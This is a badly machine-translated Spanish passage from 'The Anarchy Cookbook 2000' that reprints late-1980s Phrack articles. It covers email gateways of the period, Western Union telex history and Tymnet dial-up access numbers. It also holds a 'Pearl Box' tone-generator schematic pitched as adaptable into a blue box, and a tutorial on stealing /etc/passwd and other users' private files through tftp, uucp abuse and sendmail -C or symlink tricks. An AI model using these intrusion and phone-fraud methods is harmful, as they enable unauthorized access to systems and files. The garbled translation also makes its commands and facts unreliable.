Dirección General de Sistemas de Información de Mensajes y AT & TTeléfono: 35806921730 Lincroft, NJ 07738 Teléfono: +1 201 576 2658

MHS puerta de enlace: MHS MHS telemail Gateway: MHSAdministrador: Jim Kelsay Administrador: AT & T Correo MHSGTE Telenet Com Corp puerta de enlaceReston, VA 22096 de AT & TTeléfono: +1 703 689 6034 Lincroft, NJ 08838 Teléfono: +1 800 624 5672

CMRAnteriormente conocido como InterMail, la retransmisión de correo comercial (CRM) es un servicio de retransmisión de correo entre la Internet y tres sistemas comerciales de correo electrónico: EE.UU. Sprint / Telenet, MCI Mail, y los sistemas de DIALCOM (es decir, Compmail, NSFMAIL, y el USDA-MAIL ).

Una nota importante: El único requisito para utilizar esta pasarela de correo es que el trabajo realizado debe ser la investigación de DARPA y de otros trabajos de negocios aprobados por el gobierno. Básicamente, esto significa que a menos que tengas algún negocio relacionado con el gobierno, que no debes estar usando esta puerta de enlace. Independientemente, sería muy difícil para ellos para cribar todo lo que pasa a través de su puerta de enlace. Antes de entender los requisitos de este portal, que estaba enviando a un usuario de MCI-mail y no fue contactado por algún problema con esa comunicación. Por desgracia, me ha escrito mal la dirección de MCI-Mail en una de las cartas y la carta terminó siendo leído por los administradores del sistema que luego me informaron que yo no iba a utilizar ese sistema, así como el hecho de que les gustaría a mí cobrar para su uso. Esa era una idea interesante por su parte, de todos modos, pero tenga en cuenta que el uso de este servicio no incurrir en cargos.

La dirección del buzón de RMC en cada sistema se corresponde con la etiqueta:

Telemail: [InterMail / USCISI] TELEMAIL / EE.UU.MCI-Mail: InterMail o 107-8239CompMail: InterMail o CMP0817NSF-Mail: InterMail o NSF153USDA-Mail: InterMail o AGS9999

Ejemplos de direccionamiento para cada sistema de correo electrónico son las siguientes:

MCIMAIL: 123-4567 Dirección siete dígitos Nombre de Everett T. persona de Bowens (debe ser único!)

COMPMAIL: CMP0123 tres letras seguidas de tres o cuatro dígitos S.Cooper inicial, a continuación, "." y luego el apellido 134: CMP0123 de dominio y, a continuación ":" y entonces el sistema de combinación y número de cuenta

NSFMAIL: NSF0123 tres letras seguidas de tres o cuatro dígitos A.Phillips inicial, a continuación, "." y luego el apellido 157: NSF0123 de dominio y, a continuación ":" y entonces el sistema de combinación y número de cuenta

USDAMAIL: AGS0123 tres letras seguidas de tres o cuatro dígitos P.Shifter inicial, a continuación, "." y luego el apellido 157: AGS0123 de dominio y, a continuación ":" y entonces el sistema de combinación y número de cuenta

Page 161: 106652012 the Anarchy Cookbook 2000 Es

TELEMAIL: Usuario BARNOC (directamente en Telemail) BARNOC / LODH usuario / organización (directamente en Telemail) [BARNOC / LODH] TELEMAIL / EE.UU. [Usuario / organización] sistema de sucursales / país

Las siguientes son otras ramas del sistema de Telenet y países que pueden ser enviados por correo a:

TELEMAIL / EE.UU. NASAMAIL / EE.UU. MAIL / EE.UU. Telememo / AUSTRALIATELECOM / CANADÁ TOMMAIL / CHILE TMAILUK / GB ITALMAIL / ITALIAATI / JAPÓN PIPMAIL / ROC DGC / EE.UU. FAAMAIL / EE.UU.GSFC / EE.UU. GTEMAIL / EE.UU. TM11/USA TNET.TELEMAIL / EE.UU.USDA / EE.UU.

Nota: ScienceNET OMNET está en el sistema de correo Telenet / EE.UU. y enviar por correo a la misma, el formato sería [A.MAILBOX / OMNET] CORREO / EE.UU.. Los siguientes son subdivisiones disponibles de OMNET:

AIRE Ciencias de la Atmósfera Tierra Sólida Ciencias de la Tierra VIDA Ciencias de la Vida OCEAN de Ciencias Oceánicas POLAR Polar Estudios Interdisciplinarios ESPACIO Ciencias del Espacio y Percepción Remota

La siguiente es una lista de los sistemas de Dialcom disponibles en los países de la lista con su dominio y los números del sistema:

Servicio de nombresPaís Número de dominioSistema Numérico

KeyLink-Dialcom Australia 60 07, 08, 09Dialcom Canadá 20 20, 21, 22, 23, 24DPT libros de datos Dinamarca 124 71Telebox Finlandia 127 62Telebox Alemania Occidental 30 15, 16Dialcom Hong Kong 80 88, 89Eirmail Irlanda 100 74Goldnet Israel 50 05, 06Mastermail Italia 130 65, 67Mastermail Italia 1 66, 68Dialcom Japón 70 13, 14Dialcom Corea 1 52Telecom Oro Malta 100 75Dialcom México 1 52Memocom Países Bajos 124 27, 28, 29Memocom Países Bajos 1 55Starnet Nueva Zelanda 64 01, 02Dialcom Puerto Rico 58 25Telebox Singapur 88 10, 11, 12Dialcom Taiwan 1 52Telecom Oro Reino Unido 100 01, 04, 17, 80-89DIALCOM EE.UU. 1 29-34, 37, 38, 41-59, 61-63, 90-99

NOTA:También puede enviarlo por correo a [email protected] o [email protected] lugar de pasar por la puerta de entrada a la CMR electrónico a NASAMAIL o GSFCMAIL.

Para obtener más información e instrucciones sobre cómo utilizar CMR, envíe un mensaje al grupo de apoyo a los usuarios a [email protected] (que obtendrá básicamente lo que he enumerado, más tal vez un poco más). Por favor, lea el capítulo 3

Page 162: 106652012 the Anarchy Cookbook 2000 Es

de la saga de futuro trascendente (el limbo hasta el infinito) para obtener información específica sobre estos sistemas de correo de destino de correo.

COMPUSERVECompuServe es bien conocido por sus juegos y conferencias. Sin embargo, tienen capacidad de correo. Ahora, ellos han desarrollado su propio dominio de Internet, llamado COMPUSERVE.COM. Es relativamente nuevo y el correo puede enviarse a través de cualquiera TUT.CIS.OHIO-STATE.EDU o NORTHWESTERN.ARPA.

Ejemplo: usuario% COMPUSERVE.COM @ TUT.CIS.OHIO-STATE.EDU o reemplazar TUT.CIS.OHIO-STATE.EDU con NORTHWESTERN.ARPA).

El enlace de CompuServe que parece ser una conexión UUCP encuestados en la puerta de enlace. En realidad, es administrado a través de un conjunto de scripts de shell y una utilidad de comunicación llamada XCOMM, que opera a través de secuencias de comandos construidos sobre la marcha por los scripts de shell durante el análisis de lo puestos de trabajo existen para entrar y salir de CompuServe.

CompuServe cuentas de abonados de la 7xxxx forma, aaaa se puede abordar como 7xxxx.yyyy @ compuserve.com. Los empleados de CompuServe pueden ser abordadas por sus nombres de usuario en el subdominio csi.compuserve.com. Los suscriptores de la CEI escribir correo electrónico a "> inet: [email protected]" para enviar por correo a los usuarios en las redes de área extensa, donde "> puerta de enlace:" es interno de CompuServe sintaxis de la puerta de acceso. La puerta de enlace genera encabezados totalmente compatibles con RFC.

Para extrapolar totalmente - por el lado de CompuServe, deberá utilizar su sistema de correo EasyPlex para enviar correo a alguien en BITNET o de Internet. Por ejemplo, para enviarme correo a mi nombre de Bitnet, tendría que dirigirse a:

INET: C488869% UMCVMB.BITNET @ CUNYVM.CUNY.EDU

O a mi ID en Internet:

INET: [email protected]

Ahora, si usted tiene un identificador de usuario a la BITNET a Internet, esto es una cosa tonta por hacer, ya que su tiempo de conexión a CompuServe le cuesta dinero. Sin embargo, usted puede utilizar esta información para que la gente en CompuServe en contacto contigo. Servicio al Cliente CompuServe dice que no hay ningún cargo para recibir o enviar un mensaje a la Internet o BITNET.

DASNETDASnet es una red más pequeña que se conecta a las redes de área extensa, pero cobra por sus servicios. Abonados DASnet cobran para el correo a los usuarios de otras redes y correo electrónico para que los usuarios de otras redes. La siguiente es una breve descripción de DASnet, algunos de los cuales fue tomada de su carta texto promocional.

DASnet le permite intercambiar correo electrónico con la gente en más de 20 sistemas y redes que se interconectan con DASnet. Uno de los inconvenientes, sin embargo, es que, después de haber sido suscrito a estos servicios, usted debe suscribirse a DASnet, que es un costo aparte. Los miembros de redes de área amplia puede suscribirse a DASnet también. Algunas de las redes y sistemas accesibles a través de DASnet incluyen los siguientes:

ABA / net, AT & T Mail, BIX (intercambio de información Byte), DASnet Red, Dialcom, EIES, EasyLink, enviado 100, FAX, GeoMail, INET, MCI Mail, NWI, PeaceNet / EcoNet, portal de comunicaciones, la red de Meta, La Fuente , Telemail, Telemail de ATI (Japón), Telex, TWICS (Japón), UNISON, UUCP, el pozo, y el dominio (es decir, ". COM" y ". EDU", etc.) Los nuevos sistemas se añaden todo el tiempo. A partir de la escritura de este archivo, Connect, GoverNET, MacNET, y el Instituto Americano de Física PI-MAIL están a punto de ser conectado.

Page 163: 106652012 the Anarchy Cookbook 2000 Es

Usted puede obtener varias cuentas en DASnet incluyendo:

• Cuentas Corporativas - Si su organización desea más de una suscripción individual.

• Suscripciones del sitio - Si desea DASnet vincular directamente al sistema de su organización por correo electrónico.

Para enviar un correo electrónico a través de DASnet, de enviar el mensaje a la cuenta de DASnet en su sistema de origen. Usted recibe un correo electrónico a su buzón de correo, como lo hace ahora. En las redes de área extensa, se envía un mensaje a @ XB.DAS STANFORD.BITNET. En la línea Asunto:, escribe la dirección DASnet entre paréntesis y luego el nombre de usuario a las afueras de una de ellas. El tema real puede ser expresado después de que el nombre de usuario separados por el signo "!" (Ejemplo: Asunto: [0756TK] Randy Cómo es Phrack?).

La única desventaja del uso de DASnet a diferencia de las redes de área amplia es el costo. Los costos de suscripción a partir del 03/03/89 un costo de $ 4.75 por mes o $ 5,75 por mes para los hosts que están fuera de los EE.UU.

También se le cobrará por cada mensaje que envíe. Si se corresponden con alguien que no es un suscriptor DASnet, SU CORREO PARA USTED se factura a su cuenta.

La siguiente es una lista abreviada de costos para el envío a los diferentes servicios de DASnet:

DASnet PARCIAL lista de costos Costo DASnet de los servicios de primera 1000 cada 1000 Ligado por DASnet (correo electrónico) Personajes Personajes:

INET, MacNET, PeaceNet, Nota: 20 líneas Unison, * UUCP, Dominios, 0.21 0.11 del texto es de aprox. por ejemplo . COM,. EDU * 1000 caracteres.

Dialcom - Cualquier "host" en EE.UU. 0.36 0.25

Dialcom - Servidores fuera de los EE.UU. 0,93 0,83

EasyLink (De EasyLink) 0,21 0,11 (Para EasyLink) 5 ½ 0,23

EE.UU. FAX (disponible internacional.) 0,79 0,37

GeoMail - Cualquier "host" en EE.UU. 0.21 0.11 GeoMail - Servidores fuera de los EE.UU. 0,74 0,63

MCI (de MCI) 0,21 0,11 (A MCI) 0,78 0,25 (Libro electrónico - EE.UU.) 2,31 0,21

Telemail 0,36 0,25

W.U. Telex - Estados Unidos 1,79 1,63 (También puede enviar Télex fuera de los EE.UU.)

TWICS - Japón 0,89 0,47

* Los cargos que se dan aquí son a la puerta de entrada a la red. El usuario DASnet no está cargada para su transmisión por la propia red.

Suscriptores de DASnet reciba un Directorio DASnet Red de forma gratuita, así como un listado en el directorio, y la posibilidad de solicitar servicios opcionales DASnet como el auto-conservación del número o de servicio DASnet télex que le da su número de télex propia y Respuesta de 8,40 dólares al mes en este momento .

Page 164: 106652012 the Anarchy Cookbook 2000 Es

DASnet es una marca registrada de la DA Systems, Inc.

DA Systems, Inc. 1503 E. Campbell Avenue. Campbell, CA 95008 408-559-7434 TELEX: 910 380-3530

Las dos secciones siguientes en PeaceNet y AppleLink se encuentran en asociación con DASnet que esta red es lo que se utiliza para conectar.

125. Phrack Magazine - vol. 3, Número 28 por Dispater

Introducción:Después de leer el anterior versiones de esquemas para la Caja de Pearl, que decidió que no había una manera más fácil y más barato de hacer lo mismo con un circuito integrado y las partes que probablemente acaba de poner alrededor de la casa.

¿Qué es un cuadro de la Perla y ¿Por qué quiero uno?Una Caja Pearl es un dispositivo generador de tono que se utiliza para fabricar una amplia gama de tonos simples. Por lo tanto, sería muy fácil de modificar este diseño básico para hacer una caja azul, haciendo 2 cajas de perlas y unirlos de alguna manera.

Una Caja de Pearl se puede utilizar para crear cualquier sonido que desea que las cajas de otros no. También tiene una opción de barrido de tono que puede ser utilizado para muchas cosas, como la detección de diferentes tipos de dispositivos de espionaje telefónico.

Lista de piezas:• CD4049 RCA circuito integrado• 0,1 uF capacitor de disco• 1 uF electrolítico condensador de 16V• Resistencia de 1K• Resistencia de 10M• Pote 1Meg• 1N914 diodo• Algunos SPST momentáneo interruptores de pulsador• Un interruptor SPDT• Pila de 9 voltios y varios clips y material que debería haber por toda la casa.

State-of-the-art-text Esquema: + 1uF 16V - _______________________________ | | _____ |! ! | | | _ | _______________________ | __________ | | / | 8 ohmios ____ | __ | _____: __ | __: __ | _ | __________ | | | | 9 | 10 11 12 13 14 15 16 | | | | _ | \ | | CD4049UBE | | | | _1__2__3__4__5__6__7__8_: | _ | | | __ | | __ | | | ____________________ | _________ [-] | |! ! : [B] | | __________________________ | [A] | :: | [T] |! 1N914! ! [T] | ___________ | / | _____________________________________ [+] : | \ | :: | | | | | 10M |

Page 165: 106652012 the Anarchy Cookbook 2000 Es

| ___ / \ / \ / \ __ | | | | | | _____ | | ____ | | <- Estos 2 cables al poste central | | | | Del interruptor. 0.1 50V | | | | _______________________ | | _____________________________ | ___ [Interruptor] ____________ | | | | ___ | | | | Oo | | | | / \ / \ / \ ___ | | __ | | _ / \ / \ / \ ____ / \ / \ / \ | | ^ | 1K ^ | | ____ | ___ | | ___ | | Oo | | / \ / \ / \ ___ | | __ |

126. Phrack Magazine - vol. 3, Número 28 por Dark Overlord Hay muchas maneras de conseguir copias de los archivos desde un sistema remoto que no tiene permiso para leer o una cuenta de inicio de sesión en y acceder a ellos a través de. Muchos administradores ni siquiera se molestan para restringir muchos puntos de acceso que puede utilizar.

Estas son las formas más sencillas:

1. Utilice uucp (1) [Trivial File Transfer Protocol] para recuperar una copia de un archivo si se está ejecutando en una red basada en Internet.

2. Abuso uucp (1) [Unix to Unix Copy Program] para recuperar una copia de un archivo si las conexiones UUCP se están ejecutando en ese sistema.

3. Acceda a uno de los muchos agujeros de seguridad conocidos.

En los siguientes ejemplos, vamos a utilizar el archivo passwd que el archivo de adquirir, ya que es un archivo legible que se puede encontrar en la mayoría de los sistemas que estos ataques son válidas en.

Método A:

1. Primera puesta en el programa tftp:Escriba el siguiente comando:

tftp

[Usted tiene el siguiente mensaje:]

tftp>

2. El siguiente paso es conectar con el sistema que desea recuperar los archivos. En el tftp, escriba:

tftp> connect other.system.com

3. Ahora solicitar el archivo que desea obtener una copia de (en nuestro caso, el passwd / etc / passwd):

tftp> get / etc / passwd / tmp / passwd

[Usted debe ver algo que se parece a lo siguiente:]

Page 166: 106652012 the Anarchy Cookbook 2000 Es

Recibido 185659 bytes en 22 segundos.

4. Ahora sal del tftp con el comando "quit":

tftp> quit

Ahora debería tener una copia del archivo other.system.com 's passwd en su directorio.

NOTA: Algunos programas de sistemas Unix 'tftp tiene una sintaxis diferente. Lo anterior fue probado en SunOS 4.0

Por ejemplo, el Apolo, la sintaxis es la siguiente:

tftp - {g | ¡g | p | r | w} <archivo local> <host> <foreign file> [netascii | imagen]

Por lo tanto se debe utilizar el comando:

tftp-g password_file red-host / etc / passwd

Consulte a su "hombre" para más información (o, en otras palabras, RTFM).

Al final de este artículo, voy a incluir un script de shell que les lean un archivo de contraseñas desde un host remoto. Para usar el tipo:

GPW nombre_sistema

Método B:

Asumiendo que está recibiendo el archivo / etc / passwd del sistema de uusucker, y nuestro sistema tiene una conexión directa uucp a ese sistema, es posible solicitar una copia del archivo a través de los enlaces uucp. El siguiente comando solicitar que una copia del archivo passwd se copiará en el directorio home del uucp / usr / spool / uucppublic:

uucp-m uusucker! / etc / passwd '> uucp / uusucker_passwd'

La bandera "-m" significa que usted será notificado por correo cuando se complete la transferencia.

Método C:

La tercera forma es posible acceder al archivo deseado requiere que usted tenga el permiso de acceso al sistema.

En este caso vamos a utilizar un error conocido en el demonio sendmail de Unix.

El programa sendmail tiene y la opción "C" en el que puede especificar el archivo de configuración para usar (por defecto, este archivo es / usr / lib / sendmail.cf o / etc / sendmail.cf). También debe tenerse en cuenta que los diagnósticos entregada por sendmail contener las líneas ofensivas de texto. También tenga en cuenta que el programa se ejecuta sendmail setuid root.

La forma en que se puede abusar de este conjunto de hechos (si aún no lo han adivinado) es especificando el archivo que desea leer el archivo de configuración. Así, el comando:

sendmail -C/usr/accounts/random_joe/private/file

Le dará una copia del archivo privado al azar de Joe.

Page 167: 106652012 the Anarchy Cookbook 2000 Es

Otro truco similar es un enlace simbólico en el archivo. Mailcf de archivo de Joe y alguien electrónico. Cuando el correo se ejecuta sendmail (para enviar el correo), que se cargará en su mailcf y vomitar a cabo cosas de Joe.

En primer lugar, vincular el archivo de Joe a su archivo. Mailcf.

ln-s / usr / cuentas / random_joe / private / archivo $ HOME / .mailcf

A continuación, envía un mensaje a alguien.

electrónico [email protected]

127.Phrack Magazine - vol. 3, Número 30 por Phanatic Teléfono

"Hasta hace unos años - tal vez diez - que era muy común ver TWX y máquinas de télex, en casi todos los lugares de negocio. "

Sólo hubo pequeñas diferencias entre télex y TWX. La mayor diferencia fue que la primera fue que siempre se ejecute a través de Western Unión, mientras que el segundo fue dirigido por el sistema de Bell durante varios años. TWX significa literalmente "(T) ipo (W) Riter e (x) cambiar", y fue la respuesta de Bell a la competencia de Western Union. Había "tres filas" y "cuatro" máquinas fila, es decir, el número de teclas en el teclado y la forma en que fueron presentados. Los "tres filas de máquinas" eran simplemente parte de la red telefónica convencional, es decir, que podría marcar y hablar con otro TWX también se conecta en las líneas telefónicas regulares.

Con el tiempo se fueron reduciendo gradualmente en favor de "nuevas y mejoradas" más máquinas con llaves adicionales, así como un lector de cinta de papel de unión que permitió enviar el mismo mensaje varias veces para diferentes máquinas. Estos "cuatro filas" Las máquinas no estaban en la red de telefonía regular, pero fueron asignados sus propios códigos de área (410-510-610-710-810-910), donde aún permanecen. La única manera de una máquina de la fila cuatro se podría llamar una máquina de la fila de tres o viceversa-era a través de una puerta de entrada de todo tipo que se tradujo algunos de los caracteres únicos para cada máquina.

La red de Western Union se llamaba télex y además de ser capaz de ponerse en contacto (por dial up) otras máquinas similares, télex se pudo conectar con el TWX (y viceversa), así como todas las oficinas de Western Union públicas de todo el país. Hasta finales de 1950 o principios de 1960, todas las ciudades pequeñas en los Estados Unidos tenía una oficina de Western Union. Las grandes ciudades como Chicago tenía tal vez una docena de ellos, y que utiliza mensajeros para entregar en mano telegramas por la ciudad. Los telegramas pueden ser colocados en persona en cualquier oficina pública, o que se podría llamar a la oficina pública.

Por acuerdo con la mayoría de las empresas de telecomunicaciones, la oficina de Western Union en la ciudad casi siempre tenía el número de teléfono 4321, complementado más tarde en los intercambios automatizados con algún prefijo XXX-4321. Telegramas podría ser cargado a su factura de teléfono de su casa (esto es todavía el caso en algunas comunidades) y desde un teléfono de monedas, uno no pidió 4321, sino más bien, llama al operador y le pidió de Western Union. Esto era necesario ya que una vez que el telegrama había sido verbalmente al secretario de alambre, s / él a su vez tenía a parpadear el gancho y conseguir que su operador de vuelta en la línea para decirles que "reunir cinco dólares y veinte centavos" o lo que el costo era . Telegramas, al igual que las llamadas telefónicas, podría ser enviado recolectar o factura de terceros. Si usted tenía una cuenta con Western Union, es decir, una máquina de télex en su oficina, usted puede cobrar las llamadas no, pero lo más probable es que se limitaba a enviar el telegrama a partir de ahí, en primer lugar.

En algún momento de principios de 1960, Western Union presentó una demanda contra AT & T pide que entreguen su negocio TWX a ellos. Ellos citaron un fallo de la corte anterior, alrededor de 1950, que dijo que AT & T tenía prohibido adquirir cualquier número de empresas telefónicas que operan, excepto bajo ciertas condiciones. La Corte

Page 168: 106652012 the Anarchy Cookbook 2000 Es

Suprema estuvo de acuerdo con Western Union que "mensajes hablados" eran el dominio de Ma Bell, pero "mensajes escritos" eran el dominio de Western Union. Así Bell estaba obligado a desprenderse de la red de TWX, y Western Union ha operado ya que, aunque hace unos años se comenzó a eliminar la frase "TWX" en favor de "Telex II", su dispositivo original es "Telex yo" por supuesto. TWX todavía utiliza diez dígitos de marcación con el 610 (Canadá) o al 710/910 (EE.UU.), siendo las principales tres dígitos. Al parecer, 410-510 han sido abandonados, o al menos se usan muy poco, y Bellcore ha asignado 510 a la zona de San Francisco a partir de un año o así. 410 todavía tiene algunas cosas raras en él, como la Western Union "Infomaster", que es un equipo que funciona como una pasarela entre Telex, TWX, EasyLink y algunas otras cosas.

Hoy en día, la red de Western Union no es más que un esqueleto de lo que fue. Ahora, la mayoría de sus mensajes se manejan en el dial hasta terminales conectados a la red telefónica pública. Se ha estimado que el negocio TWX / Telex es el cincuenta por ciento de lo que era hace una década, si esa cantidad.

Luego estaba el Servicio de hora, una cosa clara, que Western Union ofrece a más de setenta años, hasta que se suspendió en el medio de 1960. El Servicio de hora de siempre y una función importante en los días previos a la corriente alterna era comúnmente disponibles. Por ejemplo, Chicago no cuentan con energía eléctrica de CA hasta el año 1945. Antes de que se utilizó DC, o corriente continua.

Bueno, para ejecutar un reloj eléctrico, que necesita 60 ciclos de corriente alterna por razones obvias, así que antes de la conversión de corriente continua a corriente alterna, eléctricos relojes de pared, como se ve en todas las oficinas eran desconocidas. ¿Cómo eran las personas a decir la hora exacta del día? Introduzca el reloj de Western Union.

La Western Union, o "reloj de telégrafo" era un viento de primavera impulsado por el reloj, pero con una diferencia. Los relojes se "perpetuamente de cuerda", fabricado por la auto-liquidación Clock Company de Nueva York. Tenían grandes baterías dentro de ellos, conocido como "células de teléfono", que tenía una vida de cerca de diez años cada uno. Un artilugio mecánico en el reloj giraría como el desenrollado muelle de reloj, y una vez cada hora causaría dos grapas metálicas en contacto durante unos diez segundos, que pasaría jugo al motor pequeño en el reloj que a su vez de re-enrolla el resorte principal . El principio era el mismo que los relojes que funcionan con pilas que vemos hoy. La batería no se ejecuta realmente el reloj - la corriente directa no puede hacer eso - sino que se enciende el motor pequeño que vuelve a los vientos de la primavera que en realidad lleva el reloj.

Los relojes de Western Union se produjo en varios tamaños y formas, que van desde las más pequeñas esferas que eran nueve pulgadas de diámetro a la más grande que había alrededor de cuarenta y cinco centímetros de diámetro. Algunos tenían las manos de barrido segundo, mientras que otros no lo hicieron. Algunos tenían una bombilla pequeña luz roja en la parte frontal que parpadea. El modelo típico es de aproximadamente dieciséis pulgadas, y fue encontrado en oficinas, escuelas, estaciones de transporte, oficinas de la estación de radio, y por supuesto en la oficina de telégrafos en sí.

La única cosa que todos los relojes que tenían en común era su caja de metal de color marrón y de color crema cara, con la insignia de "Western Union" y su logotipo de la empresa en aquellos días, que era un rayo de electricidad, como una especie de letra "Z" por la que se en su lado. Y en la prensa un poco más pequeña a continuación, las palabras "Observatorio Naval de tiempo."

Los relojes locales en una oficina o la escuela o donde sea que fueron calibrados por un "reloj maestro" (en realidad un maestro sub-) en las instalaciones. Una vez que una hora sobre la hora, el reloj maestro (sub) caería un contacto de metal por un segundo medio, y enviar cerca de nueve voltios de corriente continua hasta la línea de todos los relojes locales. A su vez, tenía una "tolerancia" de unos dos minutos en ambos lados de la hora para que la corriente que viene para que tire de la manecilla de minutos exactamente en posición vertical sobre el doce de una u otra dirección si el reloj era rápido o lento.

Page 169: 106652012 the Anarchy Cookbook 2000 Es

Los relojes de sub-master en cada edificio, a su vez fueron atendidos por el reloj principal en la ciudad, por lo general ésta era la una en la oficina de telégrafos. Cada hora a la media hora, el reloj principal en la oficina de telégrafos lanzaría la corriente a los maestros sub-, tirando de ellos en sincronía cuando sea necesario. Y en cuanto a las propias oficinas de telégrafos, que fueron atendidos dos veces al día - usted lo adivinó - el reloj maestro del Observatorio Naval en la capital de nuestra nación, por la misma rutina.

Alguien habría pulse media docena de botones al mismo tiempo, usando todos los dedos disponibles; corriente fluiría a cada oficina de telégrafos y sincronizar todos los relojes principales en todas las comunidades. Western Union cargada cincuenta centavos de dólar por mes por el servicio, y la tiró el reloj de forma gratuita! Oh, sí, hubo un cargo de instalación de alrededor de dos dólares la primera vez que tenía un servicio (es decir, un reloj) instalado.

Los relojes se han instalado y mantenido por el "hombre-reloj", un técnico de Western Union que pasó su día dando vueltas colgando nuevos relojes, llevándolos fuera de servicio, cambiar las baterías cada pocos años para cada reloj, etc

Lo que el pánico era para ellos cuando el "tiempo de guerra" (lo que ahora llamamos el horario de verano) llegó alrededor de cada año! Wally, el tipo que reparar todos los relojes en el centro de Chicago tuvo que empezar de * Jueves * antes de que el cambio oficial del domingo sólo para terminar a todos por * Martes siguiente *. Literalmente, se precipitaban en una oficina, utilice el destornillador para abrir el caso, girar la manecilla de las horas alrededor de una hora hacia adelante en la primavera, (u once horas * con interés * en el otoño ya que las manos no se pudo mover hacia atrás más allá de los doce van la izquierda), cerrar de golpe el caso de nuevo, el tornillo en ella, y pasar por el pasillo hasta el día siguiente y repetir el proceso. Él pudo terminar varias docenas de relojes por día, y por lo general la oficina le asigna un ayudante de dos veces al año para estos eventos.

Dijo que nunca se molestó en la línea de la aguja de los minutos hasta justo, porque hubiera tomado demasiado tiempo, y "..... de todas formas, siempre y cuando lo conseguimos en un minuto o así, ella misma la próxima vez que sincronice el reloj maestro envía una señal ... " Trabajar de forma rápida, se tomó un minuto a un minuto y medio para abrir el caso, girar la manecilla de minutos, puso el caso de nuevo, "detener y BS con la recepcionista de un par de segundos" y seguir adelante.

El reloj maestro envía su señal sobre las líneas telefónicas regulares de telecomunicaciones. Por lo general, terminarían en la oficina principal de cualquier lugar que era, y el maestro (sub) no se haría cargo en ese momento.

Wally dijo que era muy importante para hacer un trabajo profesional de los que cuelga el reloj para empezar. Tenía que estar al mismo nivel, y el péndulo tenía que ser justo, de lo contrario el reloj podría ganar o perder más tiempo del que podría tener cabida en el proceso de sincronización de hora. Dijo que era un reloj muy raro que en realidad estaba fuera ni siquiera por un minuto una vez cada hora, por no hablar de los dos minutos de tolerancia integradas en el engranaje funciona.

"... A veces me vienen a trabajar en la mañana del lunes, y averiguar en la oficina que la línea de reloj se había abierto la noche del viernes. Así que nadie tiene el fin de semana una señal. Por lo general, me iría en un hoyo y encontrar un lugar de abrirlo donde uno de los chicos de Bell que en mal estado, o se lo quitó y nunca lo vuelve a poner en Para averiguar dónde estaba abierta, alguien en la oficina que 'suenan' de la línea,. yo iba por el centro tras el bucle . como lo había dejado fuera, y mantener la escucha en el auricular para que Cuando me enteré de la ruptura o abierta, yo lo ate de nuevo y la oficina que soltar la línea, pero luego tuve que ir a todos los relojes * * antes de ese momento y vuelva a ellos, ya que la corriente constante de la oficina durante la búsqueda se había causado por lo general que se detengan. "

Sin embargo, dijo, una y otra vez, los relojes fueron por lo general tan bien montada y colgada de que "... era raro que nos encontraríamos con una hasta ahora fuera de sincronía que hemos tenido que ajustar manualmente. Por lo general, la primera señal de

Page 170: 106652012 the Anarchy Cookbook 2000 Es

hacerlo a través una vez que reparan el circuito se tire todo el mundo en la ciudad para compensar lo que pierde o se gana el fin de semana ... "

En 1965, Western Union decidió suspender el servicio de hora. En una carta nostálgica a los suscriptores, que anunció su decisión de suspender las operaciones al final del mes en curso, pero dijo que "el tiempo viejo amor" cualquiera que tuviera un reloj era bienvenido para mantener y seguir usándolo, no sólo no sería cualquier señal de ajuste del maestro relojes más.

Dentro de uno o dos días del anuncio oficial, todos los relojes de Western Union en el edificio de la sede del área de Chicago se había ido. Los ejecutivos que arrancó de la pared, y los llevó a casa el día en que tendrían un valor histórico. Todos los relojes de las oficinas de telégrafos desaparecieron casi al mismo tiempo, para ser sustituido por el estándar de estilo oficina, relojes de pared eléctricos.

128.Phrack Magazine - vol. 3, Número 30 por Synthecide

Hay literalmente cientos de sistemas conectados a algunas de estas redes más grandes, como Tymnet y Telenet. Navegación en torno a estas redes es muy sencillo, y por lo general muy bien explicado en la documentación on-line. Por otra parte, algunos sistemas de realidad le dirá lo que está conectado y cómo llegar a ella. En el caso de Tymnet, después de marcar, en el registro de sistema, escriba "información" de la documentación on-line.

Acceso a los sistemas a través de redes es tan sencillo como proporcionar una dirección para que pueda conectarse. La mejor manera de aprender acerca de las direcciones y la forma de hacer las cosas en una red es leer la "Guía de un principiante a la piratería (1989 Edition)", que fue en el número 22, del archivo 4 de 12, Volumen Dos (23 de diciembre de 1988). Algunos puntos se reiteran aquí.

Una vez en una red, se proporciona la NUA (dirección de red del usuario) del sistema al que desea conectarse. Nuas son cadenas de 15 dígitos, divididos en 3 campos, la dirección de red, el prefijo de área y de la DNIC. Cada campo tiene 5 dígitos, y se dejó rellena con 0, donde sea necesario.

El CIRD determina cuál es la red para tomar la dirección de. Tymnet, por ejemplo, es 03106. 03110 es Telenet.

El prefijo de área y la dirección de determinar el punto de conexión. Al proporcionar la dirección del sistema que desea conectarse, lo va a tener acceso a través de la red ... como si estuviera llamando directamente. Obviamente, a continuación, esto proporciona un nivel más de seguridad para el acceso. Mediante la conexión a una marcación externa, se puede aumentar de nuevo el nivel de seguridad que le guste, mediante el uso de la marcación externa en esa zona para conectarse al sistema remoto.

Adición - Acceso a Tymnet sobre redes de paquetes localesEsto es sólo otra manera de conseguir ese paso extra y / o pasar por alto otras rutas. Esta tabla se copia de la línea Tymnet de información. Como se dijo anteriormente, es un gran recurso, esta información on-line!

Bell AtlanticNODO CIUDAD ESTADO VELOCIDAD Número de AccesoRED03526 DOVER DELAWARE 300/2400 302/734-9465 @ PDN03526 GEORGETOWN DELAWARE 300/2400 302/856-7055 @ PDN03526 NEWARK DELAWARE 300/2400 302/366-0800 @ PDN03526 WILMINGTON DELAWARE 300/1200 302/428-0030 @ PDN03526 WILMINGTON DELAWARE 2400 302/655-1144 @ PDN06254 WASHINGTON DIST. DE COL. 300/1200 202/479-7214 @ PDN06254 WASHINGTON (Midtown) DIST. DE COL. 2400 202/785-1688 @ PDN06254 WASHINGTON (CENTRO) DIST. DE COL. 300/1200 202/393-6003 @ PDN06254 WASHINGTON (Midtown) DIST. DE COL. 300/1200 202/293-4641 @ PDN06254 WASHINGTON DIST. DE COL. 300/1200 202/546-5549 @ PDN

Page 171: 106652012 the Anarchy Cookbook 2000 Es

